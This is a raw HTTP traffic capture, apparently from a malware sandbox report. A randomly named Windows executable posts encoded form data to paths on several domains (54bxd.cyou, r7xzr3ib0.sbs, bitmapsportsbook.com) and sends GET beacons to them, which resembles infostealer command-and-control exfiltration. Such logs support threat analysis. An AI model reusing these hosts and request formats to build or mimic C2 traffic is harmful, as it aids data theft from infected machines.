                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:56.395628929 CEST224INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.1049725154.213.157.32804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:02.810854912 CEST716OUTPOST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 42 77 6f 48 48 61 67 74 6f 41 46 72 4e 41 4d 56 46 45 72 44 69 6d 77 6b 57 56 2b 46 54 76 34 71 6e 66 49 63 61 6c 36 62 56 4e 38 6a 31 69 46 78 6d 43 4e 54 54 59 50 62 51 52 4c 56 77 68 4f 5a 55 64 44 65 35 37 66 30 73 61 43 59 78 6f 45 51 4d 49 61 48 55 34 43 39 4d 6b 68 5a 46 35 36 64 47 71 4e 75 4f 6e 4d 50 66 30 63 6e 64 44 69 70 51 35 45 56 6d 75 6c 68 51 46 41 5a 6d 32 45 45 34 7a 57 55 53 51 58 53 6d 2b 64 6b 67 61 70 66 4e 54 77 30 53 4c 4a 35 33 59 49 36 35 64 72 54 36 6d 34 4a 55 50 4d 61 2b 53 51 78 37 73 75 70 4c 72 31 55 42 5a 35 44 46 4c 66 35
                                                          Data Ascii: bFGXGTdX=BwoHHagtoAFrNAMVFErDimwkWV+FTv4qnfIcal6bVN8j1iFxmCNTTYPbQRLVwhOZUdDe57f0saCYxoEQMIaHU4C9MkhZF56dGqNuOnMPf0cndDipQ5EVmulhQFAZm2EE4zWUSQXSm+dkgapfNTw0SLJ53YI65drT6m4JUPMa+SQx7supLr1UBZ5DFLf5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.1049726154.213.157.32804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:05.346828938 CEST740OUTPOST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 42 77 6f 48 48 61 67 74 6f 41 46 72 4d 68 38 56 44 6e 54 44 6b 47 77 6e 4b 6c 2b 46 61 50 34 6d 6e 66 4d 63 61 6e 57 4c 56 2f 59 6a 37 69 56 78 30 32 68 54 51 59 50 62 59 78 4c 55 75 52 4f 53 55 64 65 72 35 2b 33 30 73 5a 2b 59 78 74 67 51 4d 37 79 45 56 6f 43 2f 44 45 68 62 61 4a 36 64 47 71 4e 75 4f 6e 6f 32 66 77 34 6e 63 7a 53 70 52 64 6f 61 76 4f 6c 6d 41 6c 41 5a 69 32 45 41 34 7a 57 71 53 52 36 50 6d 37 42 6b 67 66 74 66 44 69 77 31 4a 62 49 79 34 34 4a 2b 38 64 2b 47 77 57 45 4b 64 4f 6f 55 6f 43 64 55 34 4e 50 75 61 36 55 44 53 75 6c 4e 4c 4e 71 54 36 4c 58 71 7a 52 70 73 6b 56 45 54 72 4c 75 4a 63 41 35 6e 63 77 3d 3d
                                                          Data Ascii: bFGXGTdX=BwoHHagtoAFrMh8VDnTDkGwnKl+FaP4mnfMcanWLV/Yj7iVx02hTQYPbYxLUuROSUder5+30sZ+YxtgQM7yEVoC/DEhbaJ6dGqNuOno2fw4nczSpRdoavOlmAlAZi2EA4zWqSR6Pm7BkgftfDiw1JbIy44J+8d+GwWEKdOoUoCdU4NPua6UDSulNLNqT6LXqzRpskVETrLuJcA5ncw==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.1049727154.213.157.32804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:07.873356104 CEST1753OUTPOST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 42 77 6f 48 48 61 67 74 6f 41 46 72 4d 68 38 56 44 6e 54 44 6b 47 77 6e 4b 6c 2b 46 61 50 34 6d 6e 66 4d 63 61 6e 57 4c 56 2f 51 6a 37 51 74 78 6c 68 31 54 52 59 50 62 53 52 4c 52 75 52 4f 31 55 64 57 6e 35 2b 79 44 73 63 36 59 77 4f 59 51 45 71 79 45 62 6f 43 2f 42 45 68 61 46 35 37 66 47 71 64 71 4f 6e 59 32 66 77 34 6e 63 77 4b 70 59 70 45 61 70 4f 6c 68 51 46 41 56 6d 32 45 34 34 7a 65 36 53 52 2b 66 6d 50 4e 6b 67 2f 39 66 42 51 49 31 55 4c 49 77 39 34 4a 59 38 64 6a 57 77 56 68 7a 64 4f 63 79 6f 41 4e 55 37 6f 71 35 49 2b 41 35 42 76 64 35 44 50 6a 33 79 4e 58 34 37 31 55 51 6a 6c 41 37 7a 50 6a 71 59 54 49 52 4a 50 54 78 53 4f 51 39 51 41 53 49 57 6b 2f 37 53 59 35 4f 69 42 74 69 54 49 74 69 39 4c 45 47 4b 59 67 62 6d 39 50 49 55 56 42 79 71 44 33 51 44 62 65 44 6a 33 50 33 70 4b 2b 75 6c 36 79 4d 6b 51 64 73 56 34 36 34 72 4f 61 38 7a 39 39 62 49 30 41 7a 33 6f 38 6d 57 39 2f 43 69 46 55 42 37 69 70 4b 42 73 66 4b 6f 75 77 33 57 50 44 34 37 2f 53 68 6b 6d 53 63 64 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=BwoHHagtoAFrMh8VDnTDkGwnKl+FaP4mnfMcanWLV/Qj7Qtxlh1TRYPbSRLRuRO1UdWn5+yDsc6YwOYQEqyEboC/BEhaF57fGqdqOnY2fw4ncwKpYpEapOlhQFAVm2E44ze6SR+fmPNkg/9fBQI1ULIw94JY8djWwVhzdOcyoANU7oq5I+A5Bvd5DPj3yNX471UQjlA7zPjqYTIRJPTxSOQ9QASIWk/7SY5OiBtiTIti9LEGKYgbm9PIUVByqD3QDbeDj3P3pK+ul6yMkQdsV464rOa8z99bI0Az3o8mW9/CiFUB7ipKBsfKouw3WPD47/ShkmScd4ozXHX6DQDiOUtZ379DjEliz/N4c6SagwHLRwVk2/bmgTW6G2hO6aXknAoCpWshzZzgzunCT/tVCHHhKOSkTS/RSz9VNxtwy3ehil1l7EWFCZPdW5+ypJVvJDff0dZ92OeGuS4vwfoxWUNBKu+rlV1B1HyTiYGAeqmerZQQTDRAIesLlYpjKxH2WxpxKgLPW0EofU5QWlMMNq5606BUHxOhdRbOLO5j7dI1bNhS0CcweXjrTctcYL7HotIlmKVO2bbqS8hVQ3Gnu3ySsqLJEdmnIk0aFvxVA2WPZEObhgicFS7JdW4ltQa7hVXxty9haWVvIPy97Ys/WdlPcFfU7Vyb2w68jwlUqopcrJW+ozKYNBcd1ItmEmrtn+wRMBwa581rgvM68Lras8SvbVLQ2KGHiB+u1IYiGvSLCl3k8eeDi/Ar/BBfoqOrkkMehLiY5W8aL77keLfSWAN1Qmn56b4TeYQRfK/FRAf9thgP+KufM5nsjDz7YNhSN6Oa+hB9IPyAWymtYjH6LeChhL1BNbYE8JBTkt/byVPe91aMg/MyBxNaUNXs8NZ+oIB32pd0D8mJ0fiUoJtuWMVafY6k5RXeE9S4PmDmFHwaDc7lBIhrGEj/AeNktKDYvYwo5Dg+FEKMF875xHicfpzqjqHqqjsLrJOkacN8fK7 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.1049728154.213.157.32804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:10.404664993 CEST457OUTGET /qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.104972947.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:37.402867079 CEST725OUTPOST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 56 2f 4a 49 69 66 58 72 58 33 4d 4f 54 36 5a 50 4c 65 6c 38 44 78 76 38 63 70 36 6e 57 7a 56 72 78 34 32 30 2b 77 7a 5a 79 39 51 72 56 44 35 52 55 5a 56 58 69 4c 37 45 35 37 71 64 63 30 39 70 68 38 53 69 42 2b 2f 48 77 55 50 54 56 74 77 6e 79 4d 7a 31 30 2f 79 2b 41 36 76 69 36 51 7a 51 2b 33 73 63 6f 2b 4e 2f 6c 68 73 4a 6f 78 77 63 34 36 41 44 47 4b 6a 68 69 6d 48 59 63 76 57 62 66 57 4a 61 64 78 48 5a 31 50 6b 4f 66 31 73 30 61 52 77 33 44 63 63 48 75 4b 53 4d 4f 63 76 58 6f 7a 50 41 46 6c 54 69 67 74 66 74 6a 6f 4e 79 45 45 38 43 52 50 49 6e 49 76 36
                                                          Data Ascii: bFGXGTdX=UV/JIifXrX3MOT6ZPLel8Dxv8cp6nWzVrx420+wzZy9QrVD5RUZVXiL7E57qdc09ph8SiB+/HwUPTVtwnyMz10/y+A6vi6QzQ+3sco+N/lhsJoxwc46ADGKjhimHYcvWbfWJadxHZ1PkOf1s0aRw3DccHuKSMOcvXozPAFlTigtftjoNyEE8CRPInIv6
                                                          Sep 11, 2024 22:04:38.312841892 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.104973047.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:39.935009003 CEST749OUTPOST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 56 2f 4a 49 69 66 58 72 58 33 4d 63 43 4b 5a 4e 73 4b 6c 73 54 78 6f 79 38 70 36 38 47 79 39 72 78 45 32 30 2f 30 6a 5a 48 6c 51 6f 78 4c 35 51 56 5a 56 43 69 4c 37 4c 5a 37 6a 54 38 30 32 70 68 34 61 69 42 79 2f 48 77 41 50 54 58 31 77 6e 44 4d 77 6e 55 2f 6e 32 67 37 70 73 61 51 7a 51 2b 33 73 63 6f 71 6a 2f 6c 70 73 4a 5a 68 77 63 5a 36 44 66 57 4b 69 67 69 6d 48 50 4d 75 64 62 66 57 72 61 63 73 53 5a 7a 44 6b 4f 62 39 73 30 72 52 33 2b 44 64 32 49 4f 4c 58 4a 75 42 2f 51 49 37 38 41 7a 67 61 6b 32 74 62 71 43 4a 4b 6a 56 6c 72 52 6d 54 47 70 4f 61 51 56 6b 35 61 39 36 52 43 69 6f 30 30 39 4c 71 45 4d 4d 69 67 58 67 3d 3d
                                                          Data Ascii: bFGXGTdX=UV/JIifXrX3McCKZNsKlsTxoy8p68Gy9rxE20/0jZHlQoxL5QVZVCiL7LZ7jT802ph4aiBy/HwAPTX1wnDMwnU/n2g7psaQzQ+3scoqj/lpsJZhwcZ6DfWKigimHPMudbfWracsSZzDkOb9s0rR3+Dd2IOLXJuB/QI78Azgak2tbqCJKjVlrRmTGpOaQVk5a96RCio009LqEMMigXg==
                                                          Sep 11, 2024 22:04:40.849977016 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.104973147.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:42.466953993 CEST1762OUTPOST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 56 2f 4a 49 69 66 58 72 58 33 4d 63 43 4b 5a 4e 73 4b 6c 73 54 78 6f 79 38 70 36 38 47 79 39 72 78 45 32 30 2f 30 6a 5a 45 46 51 72 47 4c 35 52 79 31 56 45 53 4c 37 47 35 37 75 54 38 30 52 70 6c 55 65 69 41 4f 46 48 79 34 50 42 45 39 77 75 52 6b 77 2b 6b 2f 6e 36 41 37 35 69 36 51 63 51 2b 6e 77 63 6f 36 6a 2f 6c 70 73 4a 62 4a 77 49 59 36 44 64 57 4b 6a 68 69 6e 47 59 63 76 36 62 65 2b 52 61 63 59 43 5a 6a 6a 6b 4a 37 74 73 6e 70 35 33 38 6a 64 30 4a 4f 4c 78 4a 75 4d 6c 51 49 6e 4b 41 7a 39 2f 6b 78 5a 62 76 6e 34 53 34 6b 31 64 41 32 33 68 6d 73 47 61 62 68 4a 53 39 5a 49 6d 6f 64 30 57 72 76 76 4f 46 64 37 5a 42 45 54 2b 65 71 7a 35 6e 51 67 4a 6a 58 72 2b 74 69 4c 58 42 6b 4a 4a 54 58 61 6f 65 47 61 35 64 4f 69 41 66 64 45 74 76 66 58 33 41 52 39 44 4a 41 72 4b 47 31 53 4c 39 6d 44 2b 64 35 49 6a 6f 46 42 30 33 67 75 69 37 4a 72 35 4e 6e 70 43 6f 77 6c 54 75 6b 46 42 55 5a 7a 44 4d 76 49 32 6d 37 6c 4a 7a 69 38 44 49 67 53 51 6b 68 63 54 74 61 4b 57 33 78 61 47 6c [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=UV/JIifXrX3McCKZNsKlsTxoy8p68Gy9rxE20/0jZEFQrGL5Ry1VESL7G57uT80RplUeiAOFHy4PBE9wuRkw+k/n6A75i6QcQ+nwco6j/lpsJbJwIY6DdWKjhinGYcv6be+RacYCZjjkJ7tsnp538jd0JOLxJuMlQInKAz9/kxZbvn4S4k1dA23hmsGabhJS9ZImod0WrvvOFd7ZBET+eqz5nQgJjXr+tiLXBkJJTXaoeGa5dOiAfdEtvfX3AR9DJArKG1SL9mD+d5IjoFB03gui7Jr5NnpCowlTukFBUZzDMvI2m7lJzi8DIgSQkhcTtaKW3xaGl1V8RUW4YeytVzWk9OSE7u3E2zFR/MvSUP6z1sso2i3s3qBDCZttrrsbWV89x3hcaJgqgZuDCPaOPYK8cpJI+hcNOv3pFe/PekLbPn0/ZAHgVPkhL3VxsCqqjIWjTCDH9gMCRYNIYXG7psldXTM/10Kr7KGySqS//j7Ea1/oR0FDk4oqZ7mX0znn1T45hp0Kj8gdugkVwpRhTdXYIuA48jiAAr0+M5YOqSNFqE0NoRW9PqRZPoSPXaC4+eFSGgkmJEUdawh1SbidM36OtS+M3KdHQKiPRWqINOpI+aqJbBVPofRZpQtfdlyXhrC8YL5qyWNY23Ol7Pn+0u1VWWyVJ8JFFMn6T/lyVS5xg1Nm4xMLpZjb9q8TDtMvCdtnH3vdbIs9VlgH4X3ioKHYrhNqE6s25bypwcNEeblkA3HkTO75zFXTaGzTVoakwlrz4sVX/1qQp3QZBDzC2vWs2EiDCf5uplZ514l73MumhDlefR/+RnKb1V5qKj+5KodJszzz8CZ9Q0ABeRQdrt41CgNLQC2dTRl52zHkOz9jHZB6/ytQrGEBjzgIBqg5NYA6otIXYmRK0adUa9r3W3DfxiSJL13j0220NDbwjJrtxS5p7VRshI8NLsvet19Eaj91GuBwiA4Krk9ZD+4Gv4BXAjtaCNR8dCcV5wiBMBX [TRUNCATED]
                                                          Sep 11, 2024 22:04:43.621826887 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1
                                                          Sep 11, 2024 22:04:43.623411894 CEST165INHTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.104973247.239.13.172804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:45.001075029 CEST460OUTGET /zqqa/?bFGXGTdX=ZXXpLVL5zGXuIyziXd74rR8Z9u95/Dmogjom9+EAQEp6mmLdAUlPVhz6U9vRTuA6wBlP9h+HTHItH2gyziEy2Gmm5hf6oNdAA8n0WZPfrmRJWLBYJQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:45.907720089 CEST224INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.104973391.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:50.969106913 CEST746OUTPOST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 51 41 38 4c 70 66 4a 77 79 35 79 7a 35 54 43 39 6a 4f 48 54 31 48 6f 61 68 2b 30 63 2f 54 50 6f 56 67 56 5a 36 74 37 66 31 65 57 6f 72 38 6f 66 77 69 37 6d 4b 2f 70 61 71 72 6f 4c 44 66 6e 57 72 69 38 37 72 41 70 47 30 4e 44 43 66 43 69 6d 66 43 70 7a 61 6f 66 68 30 50 71 75 42 4d 74 42 56 64 43 50 47 45 72 69 78 47 34 4d 76 78 37 4e 48 30 6f 37 2b 51 5a 38 46 66 73 4b 48 67 63 52 46 66 56 76 47 45 58 73 43 4a 35 43 51 48 71 79 36 6b 43 5a 75 51 79 4b 50 55 30 79 38 6c 30 78 34 73 33 49 59 4d 51 68 43 4f 70 32 6b 2f 6a 64 47 30 53 56 43 36 33 46 4a 67 45 62
                                                          Data Ascii: bFGXGTdX=QA8LpfJwy5yz5TC9jOHT1Hoah+0c/TPoVgVZ6t7f1eWor8ofwi7mK/paqroLDfnWri87rApG0NDCfCimfCpzaofh0PquBMtBVdCPGErixG4Mvx7NH0o7+QZ8FfsKHgcRFfVvGEXsCJ5CQHqy6kCZuQyKPU0y8l0x4s3IYMQhCOp2k/jdG0SVC63FJgEb
                                                          Sep 11, 2024 22:04:51.625551939 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.104973491.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:04:53.498609066 CEST770OUTPOST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 51 41 38 4c 70 66 4a 77 79 35 79 7a 2f 7a 53 39 6c 76 48 54 6c 58 6f 64 38 4f 30 63 6b 6a 50 73 56 67 52 5a 36 70 69 61 30 6f 47 6f 6f 64 59 66 78 6a 37 6d 4a 2f 70 61 6c 4c 70 42 64 76 6e 66 72 69 78 45 72 46 4a 47 30 4a 72 43 66 41 71 6d 66 56 39 79 5a 59 66 6a 37 76 71 2f 63 38 74 42 56 64 43 50 47 45 58 59 78 43 55 4d 76 42 6e 4e 42 52 55 38 39 51 5a 2f 56 76 73 4b 44 67 64 57 46 66 55 43 47 46 61 6b 43 4c 52 43 51 47 32 79 36 56 43 61 6e 51 79 4d 53 45 31 45 7a 31 52 32 33 2b 58 4c 58 66 59 35 64 4e 52 31 6e 65 43 61 58 6c 7a 43 52 4e 72 4c 48 6d 78 78 45 7a 6d 68 51 4d 67 35 7a 69 6a 50 65 34 53 6d 67 49 44 79 50 51 3d 3d
                                                          Data Ascii: bFGXGTdX=QA8LpfJwy5yz/zS9lvHTlXod8O0ckjPsVgRZ6pia0oGoodYfxj7mJ/palLpBdvnfrixErFJG0JrCfAqmfV9yZYfj7vq/c8tBVdCPGEXYxCUMvBnNBRU89QZ/VvsKDgdWFfUCGFakCLRCQG2y6VCanQyMSE1Ez1R23+XLXfY5dNR1neCaXlzCRNrLHmxxEzmhQMg5zijPe4SmgIDyPQ==
                                                          Sep 11, 2024 22:04:54.155144930 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
